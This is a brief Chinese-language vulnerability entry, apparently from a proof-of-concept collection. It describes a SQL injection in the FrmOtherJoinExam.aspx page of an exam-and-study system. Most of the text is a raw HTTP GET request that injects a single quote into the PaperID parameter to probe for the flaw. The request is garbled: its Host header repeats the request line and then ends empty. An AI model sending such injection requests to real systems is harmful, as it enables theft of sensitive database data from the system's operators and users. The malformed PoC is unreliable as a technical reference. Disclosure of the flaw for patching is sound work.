漏洞描述
考试学习系统 FrmOtherJoinExam.aspx 存在SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。
考试学习系统 FrmOtherJoinExam.aspx SQL注入
PoC代码
GET /FrmOtherJoinExam.aspx?UserCode=123456&PaperID=12'&PaperName=2&Flag=1 HTTP/1.1
Host: GET /FrmOtherJoinExam.aspx?UserCode=123456&PaperID=12'&PaperName=2&Flag=1 HTTP/1.1
Host: